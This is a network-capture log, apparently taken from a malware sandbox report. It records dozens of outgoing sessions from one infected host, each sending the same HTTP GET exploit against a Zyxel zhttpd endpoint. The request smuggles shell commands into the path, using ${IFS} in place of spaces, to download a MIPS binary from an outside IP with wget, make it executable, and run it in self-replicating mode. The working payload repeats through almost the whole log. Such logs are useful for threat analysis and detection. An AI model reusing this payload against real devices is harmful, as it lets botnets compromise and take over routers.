                                                  Jan 19, 2024 18:23:41.765367985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1126192.168.2.135194244.126.225.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765414953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1127192.168.2.135151075.255.212.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765464067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1128192.168.2.1337678176.249.138.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765487909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1129192.168.2.1342748125.173.222.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765542030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1130192.168.2.133303086.65.89.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765575886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1131192.168.2.136080879.130.134.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765609026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1132192.168.2.134876285.235.225.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775448084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1133192.168.2.1351332101.71.195.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775479078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1134192.168.2.1339784190.223.108.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775511980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1135192.168.2.1334674222.251.85.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775574923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1136192.168.2.1346592196.217.247.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775604010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1137192.168.2.135974831.181.180.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775640011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1138192.168.2.133576257.130.195.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775674105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1139192.168.2.1355746181.189.120.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775717974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1140192.168.2.133777093.128.2.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775787115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1141192.168.2.134878684.7.254.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775815964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1142192.168.2.1348532143.189.253.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775861025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1143192.168.2.13371224.165.35.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775911093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1144192.168.2.1341588173.135.28.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775949001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1145192.168.2.1358658150.81.165.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.775986910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1146192.168.2.133602653.142.150.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776010990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1147192.168.2.1360016108.126.141.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776058912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1148192.168.2.134059049.132.16.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776093960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1149192.168.2.1358546174.69.66.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776145935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1150192.168.2.1333396207.182.3.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776165962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1151192.168.2.1360986217.59.1.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776206970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1152192.168.2.1349094184.220.119.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776247978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1153192.168.2.1352146111.34.122.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776299953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1154192.168.2.1360744166.152.79.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776345968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1155192.168.2.13578481.71.119.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776384115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1156192.168.2.1357310160.29.187.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776426077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1157192.168.2.1341812162.91.137.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776479006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1158192.168.2.1351234165.126.1.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776523113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1159192.168.2.1355908194.3.150.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776552916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1160192.168.2.1337926182.66.58.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776602983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1161192.168.2.1355224114.183.251.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776618958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1162192.168.2.134963451.112.225.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776665926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1163192.168.2.135619059.47.183.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776725054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1164192.168.2.1358222187.246.146.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776746035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1165192.168.2.1351086151.64.207.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776787996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1166192.168.2.1354372124.100.69.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776813984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1167192.168.2.1349582179.200.159.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776865959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1168192.168.2.133654460.221.215.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776895046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1169192.168.2.13328068.176.3.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776948929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1170192.168.2.1337048177.241.196.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.776987076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1171192.168.2.133802083.71.94.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777046919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1172192.168.2.135208649.231.249.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777084112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1173192.168.2.1352192111.140.62.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777112961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1174192.168.2.1338664157.202.147.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777148962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1175192.168.2.1336012137.53.178.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777213097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1176192.168.2.134594498.38.140.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777254105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1177192.168.2.135143298.169.232.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777292967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1178192.168.2.1341928121.243.215.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777353048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1179192.168.2.1335740149.63.183.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777394056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1180192.168.2.1341008189.131.222.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777443886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1181192.168.2.1345116184.34.130.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777487993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1182192.168.2.1340678220.118.159.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777513027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1183192.168.2.1359248138.49.161.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777570963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1184192.168.2.135218614.117.83.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777611971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1185192.168.2.1358770189.201.10.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777642012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1186192.168.2.1337580160.186.253.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777693033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1187192.168.2.1341138118.35.44.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777721882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1188192.168.2.1357546206.157.133.131443
                                                  TimestampBytes transferredDirectionData
